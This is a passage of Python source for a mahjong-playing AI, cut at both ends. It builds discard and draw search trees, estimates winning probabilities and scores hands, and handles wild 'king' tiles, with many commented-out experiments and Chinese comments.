reverse=True)\n # t2N[len(a[2]):] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True)\n # # t2N[len():] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True) #修改为1+\n # # 扩展出牌结点\n ocards = copy.copy(a[-1])\n t2NCP = []\n t2NCP.extend(a[2] + a[3])\n\n # for t2 in t2N:\n # t2NCP.append([t2[0], t2[1]])\n kz = []\n sz = []\n for k in a[0]:\n kz.append(k[0])\n for s in a[1]:\n sz.append(s[0])\n\n # print ('ocards', ocards, 't2NCP', t2NCP)\n\n # if self.kingNum>0:\n # #溢出\n # if len(t2NCP)>4-len(self.suits):\n #\n # for ab in a[3]:\n # if\n # t1=time.time()\n self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum, kz=kz, sz=sz, xts=a[4])\n # t2=time.time()\n # print ('t21',t2-t1)\n # if self.kingNum!=0:\n # # if self.kingNum<=2:\n # #宝吊打法,最快胡牌\n # node.jiang=self.kingCard\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum-1, kz=kz, sz=sz,xts=self.xts)\n # #飞宝打法,\n # ocardsKing=copy.copy(ocards)\n\n # ocardsKing.append(self.kingCard)\n # self.expandNode(node=node, ocards=ocardsKing, t2N=t2NCP, kingNum=self.kingNum-1, kz=kz, sz=sz,xts=self.xts)\n\n # if self.kingNum > 1:\n # KN=self.kingNum - 1\n # else:\n # KN=self.kingNum\n #\n #\n # for i in range(KN):\n # ocardsKing.append(self.kingCard)\n # #只有一张宝做宝吊,其他全部打掉\n # if self.kingNum==1:\n # for aa in a[2]:\n # node.jiang = aa[0]\n # t2NCP_rmJ = copy.deepcopy(t2NCP)\n # t2NCP_rmJ.remove(aa)\n # self.expandNode(node=node, ocards=ocardsKing, t2N=t2NCP_rmJ, kingNum=self.kingNum-KN, kz=kz, sz=sz,xts=self.xts+KN)\n # return\n # # #宝牌全部打掉\n # else:\n # # 留一宝\n # node.jiang = self.kingCard\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum-KN, kz=kz, sz=sz,xts=self.xts+KN)\n # #\n # #全打\n # ocards_allKing=copy.copy(ocards)\n # for i in range(self.kingNum):\n # ocards_allKing.append(self.kingCard)\n # for aa in a[2]:\n # node.jiang = aa[0]\n # t2NCP_rmJ = copy.deepcopy(t2NCP)\n # t2NCP_rmJ.remove(aa)\n # self.expandNode(node=node, ocards=ocards_allKing, 
t2N=t2NCP_rmJ, kingNum=0,kz=kz, sz=sz,xts=self.xts+self.kingNum)\n # #\n # elif len(a[2])!=0:\n # #aa做将打法\n # for aa in a[2]:\n # node.jiang=aa[0]\n # t2NCP_rmJ=copy.deepcopy(t2NCP)\n # t2NCP_rmJ.remove(aa)\n # # print ocards,t2NCP_rmJ\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP_rmJ, kingNum=self.kingNum, kz=kz,sz=sz,xts=self.xts)\n #\n # #aa不做将打法\n # node.jiang=0\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum, kz=kz,sz=sz,xts=self.xts)\n # else:\n # node.jiang=0\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum, kz=kz, sz=sz,xts=self.xts)\n\n # # 宝还原处理\n # if self.kingNum != 0:\n # allBaoHuanYuan = pinghu(self.cards, self.suits, self.leftNum).sys_info_V3(self.cards, self.suits,\n # self.leftNum)\n # for a in allBaoHuanYuan:\n # t2N = copy.deepcopy(a[2] + a[3])\n # efc_cards, t2_w = pinghu(cards=self.cards, suits=self.suits,\n # leftNum=self.leftNum).get_effective_cards_w(dz_set=t2N, left_num=self.leftNum)\n # for i in range(len(t2N)):\n # t2N[i].append(t2_w[i])\n # t2N[:len(a[2])] = sorted(t2N[:len(a[2])], key=lambda k: k[2], reverse=True)\n # t2N[len(a[2]):] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True)\n # # t2N[len():] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True) #修改为1+\n # # 扩展出牌结点\n # ocards = a[-1]\n # t2NCP = []\n # for t2 in t2N:\n # t2NCP.append([t2[0], t2[1]])\n # kz = []\n # sz = []\n # for k in a[0]:\n # kz.append(k[0])\n # for s in a[1]:\n # sz.append(s[0])\n # # 这里宝还原,将kingNum置0\n # self.kingNum = 0\n # kingNum = self.kingNum\n # # for i in range(self.kingNum):\n # # ocards.append(self.kingCard)\n # node.noUseKingNum = kingNum\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=0, baoHuanYuan=True, kz=kz, sz=sz)\n\n def getRate(self, node, rate):\n \"\"\"\n 功能:对叶结点进行评估\n 思路:递归计算评估值,当叶结点已经胡牌时,计算评估值=胡牌概率×危险度×分数,并进行了去重处理,对具有相同的抓牌路径视为同一路径,对视为相同的路径只取最大的评估值的路径作为最后的路径\n :param node: 本次需要计算的结点\n :param rate: 本路径现有的评估值\n :return: 更新了类变量中各路径的评估值与路径的胡牌信息,包括stateSet 胡牌状态集合 scoreDict 分数集合\n \"\"\"\n # print ('nodeInfo',node.kz,node.sz,node.jiang,node.rate,node.children == [] )\n # if node.level!=0:\n # print ('getRate',node.level)\n children = node.children\n if children == []:\n\n # 胡牌结点\n # 有宝的树\n # print (node.feiKingNum,self.kingNum+self.fei_king,node.level)\n # if self.kingNum>0 and node.feiKingNum==self.kingNum+self.fei_king and node.level>self.xts*2:\n # print (node.feiKingNum,self.kingNum+self.fei_king)\n # return\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0 and node.rate != 0 and node.type == 2:\n # if\n # node.nodeInfo()\n # if node.rate != 0 and node.type == 2 and len(node.t2) == 2:\n # # print('here')\n # if node.t2[0] != node.t2[1]:\n # # node.rate = float(self.leftNum[convert_hex2index(node.catchCard)]) / self.remainNum * 1\n # node.rate *= 0.5\n # else:\n # node.rate *= 0.25 # print (node.rate) # else: # node.rate*2.0/3\n\n if node.type == 2 and len(node.t2) == 2:\n # if node.t2==[3,3]:\n # print (self.leftNum[convert_hex2index(node.catchCard)])\n node.rate = float(self.leftNum[convert_hex2index(node.catchCard)]) / self.remainNum\n if node.t2[0] == node.t2[1]:\n node.rate *= 1.5\n\n # print ('rate',node.rate,node.catchCard,self.leftNum[convert_hex2index(node.catchCard)])\n # else:\n # print ('ERROR rate rate')\n # return\n\n rate *= node.rate\n if rate != 0 and node.jiang == 0:\n pass\n # print('getRate Error', node.cards, node.kz, node.sz, node.level)\n # todo 可以优化时间\n if rate != 0:\n # if node.level==4:\n # print 
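\n            # Editor's note (hedged sketch of the de-duplication applied below): paths that draw the same tile set count as one state per discard, and only the best-scoring variant survives:\n            # def keep_best(table, discard, catch_key, score):\n            #     best = table.setdefault(discard, {})\n            #     if catch_key not in best or score > best[catch_key]:\n            #         best[catch_key] = score\n            # table = {}; keep_best(table, 0x07, (3, 8), 1.5); keep_best(table, 0x07, (3, 8), 0.9)\n            # assert table[0x07][(3, 8)] == 1.5\n            # 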
(node.nodeInfo(),node.parent.parent.nodeInfo())\n catchCards = node.formerCatchCards\n outCards = node.formerOutCards\n state = []\n state.append(node.kz)\n state.append(node.sz)\n state.append(node.jiang)\n # if node.feiKingNum==0:\n # print(node.feiKingNum)\n fan = Fan2(node.kz, node.sz, node.jiang, node, node.feiKingNum,\n self.kingNum + self.fei_king).fanDetect()\n if fan > self.maxScore[0]:\n # self.maxScore[2]=self.maxScore[1]\n self.maxScore[1] = self.maxScore[0]\n self.maxScore[0] = fan\n\n # print ('fan',fan)\n # print (rate)\n score = rate * fan\n # if catchCards==[8,23]:\n # print (\"tree1\",rate,fan,score)\n state.append(fan)\n\n # score = rate * (2 + sum(fanList))\n # if [catchCards,outCards]==[[3, 8, 19], [4, 22, 23]]:\n # print node.t2,node.parent.parent.t2,node.parent.parent.parent.parent.t2\n # print node.rate,node.parent.parent.rate,node.parent.parent.parent.parent.rate\n\n # if node.firstOutCard==0:\n # print ('firstOutCard Error')\n for card in outCards:\n # if card ==22:\n # # print ('state',state,score)\n # if state== [[24], [1, 7, 17, 39], 6, 0]:\n # print (score,node.rate,node.t2,node.parent.parent.rate,node.parent.parent.t2)\n if card not in self.stateSet.keys():\n self.stateSet[card] = [[], [], []]\n self.stateSet[card][0].append(catchCards)\n self.stateSet[card][1].append(outCards)\n self.stateSet[card][2].append(state)\n\n self.scoreDict[card] = []\n self.scoreDict[card].append(score)\n else:\n if catchCards not in self.stateSet[card][0]:\n self.stateSet[card][0].append(catchCards)\n self.stateSet[card][1].append(outCards)\n self.stateSet[card][2].append(state)\n self.scoreDict[card].append(score)\n else:\n\n index = self.stateSet[card][0].index(catchCards)\n if score > self.scoreDict[card][index]:\n self.scoreDict[card][index] = score\n # self.stateSet[card][0][index] = catchCards\n self.stateSet[card][1][index] = outCards\n self.stateSet[card][2][index] = state\n return\n else:\n rate *= node.rate\n for child in children:\n self.getRate(child, rate)\n\n def getCardScore(self):\n \"\"\"\n 功能:计算每张出牌的评估值,并输出评估值最高的牌作为最佳出牌\n 思路:对类变量中的scoreDict 累加计算出牌的评估值\n :return: outCard 最佳出牌\n \"\"\"\n # 建树\n t1 = time.time()\n self.generateTree()\n t2 = time.time()\n outCardsNodes = self.root.children\n for i in range(len(outCardsNodes)):\n rate = 1\n node = outCardsNodes[i]\n self.getRate(node=node, rate=rate)\n nodeNum = 0\n t3 = time.time()\n print('scoreDict', self.scoreDict)\n for k in self.scoreDict.keys():\n\n nodeNum += len(self.scoreDict[k])\n k_score = 0\n for i in range(len(self.scoreDict[k])):\n # print (k)\n # n=self.stateSet[k][0][i][1].count(k)\n # print (k,n)\n if self.stateSet[k][2][i][3] >= 16:\n k_score += self.scoreDict[k][i] * 2\n else:\n k_score += self.scoreDict[k][i]\n # self.scoreDict[k] = sum(self.scoreDict[k])\n self.scoreDict[k] = k_score\n\n print('score', self.scoreDict)\n print('stateSet', self.stateSet)\n print('nodeNum', nodeNum)\n print('usetime', t2 - t1, t3 - t2)\n return self.scoreDict\n\n\nclass Discard_Node:\n def __init__(self, discard=None, AAA=[], ABC=[], jiang=[], T2=[], T1=[], taking_set=[], king_num=0, fei_king=0,\n baohuanyuan=True):\n self.discard = discard\n self.AAA = AAA\n self.ABC = ABC\n self.jiang = jiang\n self.T2 = T2\n self.T1 = T1\n self.king_num = king_num\n self.fei_king = fei_king\n # self.T_selfmo = copy.copy(T_selfmo)\n self.children = []\n self.taking_set = taking_set\n self.baohuanyuan = baohuanyuan\n # self.value = 1\n self.taking_set_w = []\n\n def add_child(self, child):\n self.children.append(child)\n\n def 
is_exist(self, nodes):\n for node in nodes:\n if node.discard == self.discard and node.AAA == self.AAA and node.ABC == self.ABC and node.T2 == self.T2 and node.T1 == self.T1 and node.king_num == self.king_num and node.fei_king == self.fei_king:\n return True\n # else:\n # return False\n return False\n\n def node_info(self):\n print(self.AAA, self.ABC, self.jiang, \"T1=\", self.T1, \"T2=\", self.T2, self.taking_set, self.king_num,\n self.fei_king, self.baohuanyuan)\n\n\nclass Take_Node:\n def __init__(self, take=None, AAA=[], ABC=[], jiang=[], T2=[], T1=[], taking_set=[], taking_set_w=[], king_num=0,\n fei_king=0, baohuanyuan=False):\n self.take = take\n self.AAA = AAA\n self.ABC = ABC\n self.jiang = jiang\n self.T2 = T2\n self.T1 = T1\n self.king_num = king_num\n self.fei_king = fei_king\n self.children = []\n self.taking_set = taking_set\n # self.value = value\n self.baohuanyuan = baohuanyuan\n self.taking_set_w = taking_set_w\n\n def add_child(self, child):\n self.children.append(child)\n\n def node_info(self):\n print(self.AAA, self.ABC, self.jiang, \"T1=\", self.T1, \"T2=\", self.T2, self.taking_set, self.king_num,\n self.fei_king, self.baohuanyuan)\n\n def is_exist(self, nodes):\n for node in nodes:\n if node.take == self.take and node.AAA == self.AAA and node.ABC == self.ABC and node.T2 == self.T2 and node.T1 == self.T1 and node.king_num == self.king_num and node.fei_king == self.fei_king:\n return True\n return False\n\n\nclass SearchTree_take:\n def __init__(self, hand, suits, combination_sets, king_card=None, fei_king=0):\n self.hand = hand\n self.suits = suits\n self.combination_sets = combination_sets\n self.xts = combination_sets[0][-2]\n self.tree_dict = []\n self.king_card = king_card\n self.fei_king = fei_king\n if king_card != None:\n self.king_num = hand.count(king_card)\n else:\n self.king_num = 0\n self.discard_score = {}\n self.discard_state = {}\n self.node_num = 0\n self.chang_num = 0\n\n def expand_node(self, node):\n # 胡牌判断\n # print \"a\"\n if len(node.AAA) + len(node.ABC) == 4 and node.jiang != []:\n if node.king_num > 0:\n node.fei_king += node.king_num # 多余的宝牌都没飞掉\n node.king_num = 0\n if node.baohuanyuan and node.fei_king == self.king_num + self.fei_king: # 宝牌全部飞完了,所以就不是宝还原了\n node.baohuanyuan = False\n return\n\n # 超时终止\n # if time.time() - TIME_START > 2.5:\n # logger.warning(\"time out!,%s,%s,%s\", self.hand, self.suits, self.king_card)\n # return\n # 节点扩展,只考虑摸牌\n # 判断需要扩展哪类\n # 当T3的数量不够时\n # if node.king_num == 0:\n if len(node.AAA) + len(node.ABC) < 4:\n if node.T2 != []: # 1、先扩展T2为T3\n for t2 in node.T2:\n for item in t2tot3_dict[str(t2)]:\n if item[1][0] == item[1][1]:\n AAA = MJ.deepcopy(node.AAA)\n AAA.append(item[1])\n ABC = node.ABC\n else:\n AAA = node.AAA\n ABC = MJ.deepcopy(node.ABC)\n ABC.append(item[1])\n T2 = MJ.deepcopy(node.T2)\n T2.remove(t2)\n T1 = node.T1\n if node.king_num > 0 and item[-2] == self.king_card: # 宝还原\n # take = -1 # 修正,0->-1\n # king_num -= 1\n # baohuanyuan = node.baohuanyuan\n child = Take_Node(take=-1, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=T2,\n T1=T1, taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 1,\n fei_king=node.fei_king, baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n elif node.king_num > 1: # 宝牌补一张\n # take = 0\n # king_num -= 1\n # baohuanyuan = False\n # taking_set = copy.copy(node.taking_set)\n # taking_set_w = copy.copy(node.taking_set_w)\n # king_num = node.king_num\n\n child = Take_Node(take=0, AAA=AAA, ABC=ABC, 
jiang=node.jiang, T2=T2,\n T1=T1, taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 1,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n else: # normal\n taking_set = copy.copy(node.taking_set)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set.append(item[-2])\n taking_set_w.append(item[-1])\n child = Take_Node(take=item[-2], AAA=AAA, ABC=ABC, jiang=node.jiang, T2=T2,\n T1=T1, taking_set=taking_set, taking_set_w=taking_set_w,\n king_num=node.king_num,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n if node.T2 == []: # or (node.king_num == 0 and len(node.T2) == 1 and node.T2[0][0] == node.T2[0][1]): # 2、扩展T1为T3? \"t1\":[[t3,t2,p]] 这里无宝要留将的打法\n for t1 in node.T1:\n for item in t1tot3_dict[str(t1)]:\n T1 = copy.copy(node.T1)\n T1.remove(t1)\n # 用于处理废牌存在于T1中的特殊情况\n # flag1 = False\n # for card in item[1]:\n # if card in T1:\n # T1.remove(card)\n # T2 = MJ.deepcopy(node.T2)\n # T2.append(sorted([card, t1]))\n # # logger.info(\"merge T1 to T2,%s,%s\", t1, T2)\n # child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=node.jiang, T2=T2, T1=T1,\n # taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n # king_num=node.king_num, fei_king=node.fei_king,\n # baohuanyuan=node.baohuanyuan)\n # node.add_child(child=child)\n # self.expand_node(node=child)\n # flag1 = True\n # break\n # if flag1:\n # continue\n\n flag2 = False\n if node.king_num >= 0: # 用于处理宝还原\n for card in item[1]:\n if card == self.king_card:\n T2 = MJ.deepcopy(node.T2)\n T2.append(sorted([card, t1]))\n flag2 = True\n child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=node.jiang, T2=T2,\n T1=T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 1, fei_king=node.fei_king,\n baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(node=child)\n if flag2:\n continue\n\n if item[0][0] == item[0][1]:\n AAA = MJ.deepcopy(node.AAA)\n AAA.append(item[0])\n ABC = node.ABC\n else:\n AAA = node.AAA\n ABC = MJ.deepcopy(node.ABC)\n ABC.append(item[0])\n\n # king_num = node.king_num\n\n if node.king_num > 2: # 宝牌有3张以上,直接补2张,即使其中有一张被作为宝还原也不影响\n child = Take_Node(take=[0, 0], AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 2, fei_king=node.fei_king,\n baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n elif node.king_num <= 1: # 宝为1或0 的处理\n take = item[1]\n take_w = item[-1]\n\n taking_set = copy.copy(node.taking_set)\n taking_set.extend(take)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.extend(take_w)\n # taking_set_w.append(take_w[0]) #区别顺序\n # taking_set_w.append(take_w[1]+1)\n child = Take_Node(take=take, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n taking_set=taking_set, taking_set_w=taking_set_w,\n king_num=node.king_num, fei_king=node.fei_king,\n baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n else: # king_num=2 ,补一张牌,或者不补摸2张\n # 用1张宝牌\n for i in range(len(item[1])):\n card = item[1][i]\n take = [0, card]\n\n taking_set = copy.copy(node.taking_set)\n taking_set.append(card)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.append(1)\n\n child = Take_Node(take=take, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n taking_set=taking_set, taking_set_w=taking_set_w,\n 
king_num=node.king_num - 1, fei_king=node.fei_king,\n baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n # 不用宝牌\n # taking_set = copy.copy(node.taking_set)\n # taking_set.extend(item[1])\n # taking_set_w = copy.copy(node.taking_set_w)\n # taking_set_w.extend(item[-1])\n # child = Take_Node(take=item[1], AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n # taking_set=taking_set, taking_set_w=taking_set_w,\n # king_num=node.king_num, fei_king=node.fei_king,\n # baohuanyuan=node.baohuanyuan)\n # node.add_child(child=child)\n # self.expand_node(node=child)\n\n\n\n\n else: # 添加将牌\n # 判断是否已经达到胡牌状态\n # 非双宝做将加宝还原的不算宝还原\n if len(node.AAA) + len(node.ABC) == 4:\n has_jiang = False\n for t2 in node.T2: # 有将\n T2 = MJ.deepcopy(node.T2)\n # 从t2中找到对子作为将牌\n if t2[0] == t2[1]:\n has_jiang = True\n T2.remove(t2)\n child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=t2, T2=T2,\n T1=node.T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num,\n fei_king=node.fei_king, baohuanyuan=False) # 非宝吊宝还原\n node.add_child(child=child)\n self.expand_node(node=child)\n # break #移除,好像也不影响,后面评估去重是按摸牌来确定的,这里也不会摸牌了\n if node.king_num >= 2: # 宝还原\n has_jiang = True # 补上,有宝时不再搜索无将情况\n child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=[self.king_card, self.king_card],\n T2=node.T2,\n T1=node.T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 2,\n fei_king=node.fei_king, baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(child)\n\n elif node.king_num > 0: # 宝吊,\n has_jiang = True\n taking_set = copy.copy(node.taking_set)\n taking_set.append(0)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.append(1)\n child = Take_Node(take=0, AAA=node.AAA, ABC=node.ABC, jiang=[0, 0], T2=node.T2,\n T1=node.T1,\n taking_set=taking_set, taking_set_w=taking_set_w, king_num=node.king_num - 1,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(child)\n\n if not has_jiang:\n jiangs = copy.copy(node.T1)\n for t2 in node.T2: # 将T2中的牌也加入到将牌中\n jiangs.extend(t2)\n for t1 in jiangs:\n taking_set = copy.copy(node.taking_set)\n taking_set.append(t1)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.append(1)\n T1 = copy.copy(jiangs)\n T1.remove(t1)\n child = Take_Node(take=t1, AAA=node.AAA, ABC=node.ABC, jiang=[t1, t1], T2=[],\n T1=T1,\n taking_set=taking_set, taking_set_w=taking_set_w, king_num=node.king_num,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n def generate_tree(self):\n kz = []\n sz = []\n for t3 in self.suits:\n if t3[0] == t3[1]:\n kz.append(t3)\n else:\n sz.append(t3)\n for cs in self.combination_sets:\n # 超时处理,直接返回\n # time.sleep(2)\n # if time.time()-TIME_START>2:\n # logger.warning(\"time out!%s,%s,%s\",self.hand,self.suits,self.king_card)\n # return\n # t1=time.time()\n # 这里只搜素非胡牌的出牌\n root = Take_Node(take=None, AAA=cs[0] + kz, ABC=cs[1] + sz, jiang=[], T2=cs[2] + cs[3], T1=cs[-1],\n taking_set=[], taking_set_w=[], king_num=self.king_num,\n fei_king=self.fei_king, baohuanyuan=self.king_num > 0)\n\n self.tree_dict.append(root)\n self.expand_node(node=root)\n\n def cal_score(self, node):\n value = 1\n\n # 矫正1->3的权重\n # t13 = []\n # w_set = []\n # taking_set_w = copy.copy(node.taking_set_w)\n # for k in range(len(node.taking_set_w)):\n # if node.taking_set_w[k] == MJ.w_aa + 1 or node.taking_set_w[k] == MJ.w_ab + 1:\n # taking_set_w[k] -= 1\n # 
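\n        # Editor's note (hedged, simplified reading of the value product in cal_score below): every forced draw multiplies the path value by its self-draw probability times an ordering weight, and the final winning tile carries weight 1; the T_SELFMO-like table here is a stand-in:\n        # def path_value(draws, t_selfmo, weights):\n        #     value = 1.0\n        #     for i, card in enumerate(draws):\n        #         w = weights[i] if i != len(draws) - 1 else 1.0\n        #         value *= t_selfmo[card] * w\n        #     return value\n        # assert path_value([0, 1], {0: 0.1, 1: 0.2}, [2.0, 5.0]) == 0.1 * 2.0 * 0.2\n        # 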
t13.append(k - 1) # t13的前一张牌不能被作为最后一张摸到的牌,这里有顺序\n\n if node.take != 0: # 非宝吊\n w = 0\n\n for i in range(len(node.taking_set)):\n card = node.taking_set[i]\n value *= T_SELFMO[MJ.convert_hex2index(card)]\n if i != len(node.taking_set) - 1:\n w_ = node.taking_set_w[i]\n # elif node.taking_set_w[i]==MJ.w_aa:\n # w_=1.5\n else:\n w_ = 1\n\n value *= T_SELFMO[MJ.convert_hex2index(card)] * w_\n\n # if i not in t13:\n # w_ = 1\n # for j in range(len(taking_set_w)):\n # # if j!=len(node.taking_set_w) and node.taking_set_w[j+1]!=[]\n # if j != i:\n # w_ *= taking_set_w[j]\n #\n # # elif taking_set_w[j] == MJ.w_aa:\n # # w_ *= 1.5 # todo 玄学调试,这里是区别aa+ab与aa+aa的权重比,这里是必须要有的\n # w += w_\n # w_set.append(w_)\n # w *= 1.0 / (len(taking_set_w)-len(t13))\n # w=max(w_set) #只取最大的w\n w = 1\n else: # 宝吊\n for i in range(len(node.taking_set)):\n card = node.taking_set[i]\n if card != 0:\n value *= T_SELFMO[MJ.convert_hex2index(card)] * node.taking_set_w[i]\n else:\n value *= 1.5 # 我给宝吊更多机会\n\n # print node.taking_set\n # if len(node.taking_set)>=2:\n # value*=1.2 #宝吊的真实概率可以翻倍,因为55还可以组456、567、678等,这是隐含的概率\n w = 1\n # print node.taking_set,value,w\n value *= w\n\n # 摸牌概率修正,当一张牌被重复获取时,T_selfmo修改为当前数量占未出现牌数量的比例 0.4s\n # taking_set = list(set(node.taking_set))\n # taking_set_num = [node.taking_set.count(i) for i in taking_set]\n # for i in range(len(taking_set_num)):\n #\n # n = taking_set_num[i]\n #\n # while n > 1:\n # index = MJ.convert_hex2index(taking_set[i])\n # if LEFT_NUM[index] >= n:\n # value *= float((LEFT_NUM[index] - n + 1)) / (LEFT_NUM[index] - n + 2)\n # else: # 摸牌数超过了剩余数,直接舍弃\n # value = 0\n # return value\n # n -= 1\n # len_taking=len(node.taking_set)\n # xts=self.combination_sets[0][-2]\n # 摸牌次数越多,危险度越大\n # if len_taking==xts:\n # value = 1\n # else:\n # value=1\n # for i in range(len_taking-xts):\n # value *= 1 - (0.02*(i+1))\n fan, fan_list = Fan(kz=node.AAA, sz=node.ABC, jiang=node.jiang, fei_king=node.fei_king,\n using_king=self.king_num + self.fei_king - node.fei_king,\n baohuanyuan=node.baohuanyuan).fanDetect()\n # print node.taking_set\n # fan=1\n # fan*=fan/4 #倍率2\n # if fan>=16:# todo 16分倍率2\n # fan*=2\n # n=len(node.taking_set)\n\n # if ROUND+n>9:\n # value *= 0.95**(len(node.taking_set)-self.xts) #加入惩罚系数\n # if fan>=16: #todo 没调好。\n # fan*=1.5\n # fan = 1\n score = fan * value\n # print taking_set\n\n # print fan,value\n # node.node_info()\n # print fan,score\n return score, value, fan_list\n\n def calculate_path_expectation(self, node):\n # 深度搜索\n # node.node_info()\n # print value\n # value_ = value\n # print node.AAA,node.ABC,node.jiang\n\n if len(node.AAA) + len(node.ABC) == 4 and node.jiang != []:\n self.node_num += 1\n # 测试:最快胡牌 #可能搜索到了一些不应该出现的局面,这些概率影响了\n # xts = self.combination_sets[0][-2]\n # layer = len(node.taking_set)\n # if node.take!=0:\n # if layer>xts:\n # return\n # elif layer-1>xts:\n # return\n\n # 弃牌不应该出现在摸牌中 done 先去掉已出牌不再摸的情况\n discard_set = []\n for i in range(node.fei_king - self.fei_king):\n discard_set.append(self.king_card)\n for t2 in node.T2:\n discard_set.extend(t2)\n discard_set.extend(node.T1)\n if self.combination_sets[0][-2] != 0:\n\n for i in range(len(discard_set) - 1, -1, -1): #\n card = discard_set[i]\n\n # 出了对牌,但是最后没有将牌的情况应该舍去,\n if discard_set.count(card) >= 2 and node.take not in [0, -1]:\n return\n # 出牌存在于摸牌中\n if card in node.taking_set:\n # logger.warning(\"remove disicard card in takingset,%s,%s\",discard_set,node.taking_set)\n return\n\n # node.AAA.sort()\n # node.ABC.sort()\n taking_set_sorted = sorted(node.taking_set)\n # taking_set_sorted 
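\n            # Editor's note (sketch of the consistency rule enforced above): a path that discards a tile and later draws the same tile is pruned, since it reaches the same hand by a strictly longer route:\n            # def path_is_consistent(discards, draws):\n            #     return all(card not in draws for card in discards)\n            # assert path_is_consistent([0x05], [0x11, 0x12])\n            # assert not path_is_consistent([0x05], [0x05, 0x12])\n            # taking_set_sorted 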
= node.taking_set\n if discard_set != []:\n score, value, fan_list = self.cal_score(node=node) # 放到外面减耗时\n if score == 0: # 胡牌概率为0\n return\n else:\n return\n # todo 这种按摸牌的评估方式是否唯一准确\n for card in list(set(discard_set)):\n\n # for card in [discard]:\n if card not in self.discard_state.keys():\n self.discard_state[card] = [[], [], [], []]\n if taking_set_sorted not in self.discard_state[card][0]:\n self.discard_state[card][0].append(taking_set_sorted)\n\n self.discard_state[card][1].append([node.AAA, node.ABC, node.jiang])\n self.discard_state[card][2].append([value, fan_list])\n self.discard_state[card][-1].append(score)\n # elif time.time() - TIME_START < 2.3: # 时间处理3\n else:\n index = self.discard_state[card][0].index(taking_set_sorted)\n if score > self.discard_state[card][-1][index]:\n self.chang_num += 1\n self.discard_state[card][1][index] = ([node.AAA, node.ABC, node.jiang])\n self.discard_state[card][2][index] = ([value, fan_list])\n self.discard_state[card][-1][index] = score\n\n elif node.children != []:\n for child in node.children:\n self.calculate_path_expectation(node=child)\n\n def calculate_path_expectation2(self, node, discard):\n # node.node_info()\n # print value\n # value_ = value\n # print node.AAA,node.ABC,node.jiang\n if len(node.AAA) + len(node.ABC) == 4 and node.jiang != []:\n node.AAA.sort()\n node.ABC.sort()\n # print \"that way\"\n # 去除宝牌补的0,最后的将牌补的0保留\n if self.king_num != 0:\n while 0 in node.taking_set[:-1]:\n node.taking_set[:-1].remove(0)\n node.taking_set[:-1].sort()\n # if node.taking_set[-1] != 0: # 非宝吊, 宝吊给1\n # value\n # node.value = T_SELFMO[MJ.convert_hex2index(node.take)]\n # 计算胡牌概率\n value = 1\n if node.take == -1:\n # print node.taking_set_w\n node.taking_set_w[-1] = 1\n for i in range(len(node.taking_set)):\n card = node.taking_set[i]\n if card != 0:\n # print node.taking_set_w, i, node.taking_set\n value *= T_SELFMO[MJ.convert_hex2index(card)] * node.taking_set_w[i]\n\n # 摸牌概率修正,当一张牌被重复获取时,T_selfmo修改为当前数量占未出现牌数量的比例\n taking_set = list(set(node.taking_set))\n taking_set_num = [taking_set.count(i) for i in taking_set]\n # value *= node.value\n for i in range(len(taking_set_num)):\n # print \"aaa\"\n # print taking_set,taking_set_num\n n = taking_set_num[i]\n index = MJ.convert_hex2index(taking_set[i])\n\n while n > 1:\n if LEFT_NUM[index] >= n:\n value *= (LEFT_NUM[index] - n + 1) / (LEFT_NUM[index] - n + 2)\n else:\n value = 0\n n -= 1\n # print node.baohuanyuan\n # if node.baohuanyuan:\n # print \"node_info...\"\n # node.node_info()\n fan = Fan(kz=node.AAA, sz=node.ABC, jiang=node.jiang, fei_king=node.fei_king, king_num=node.king_num,\n 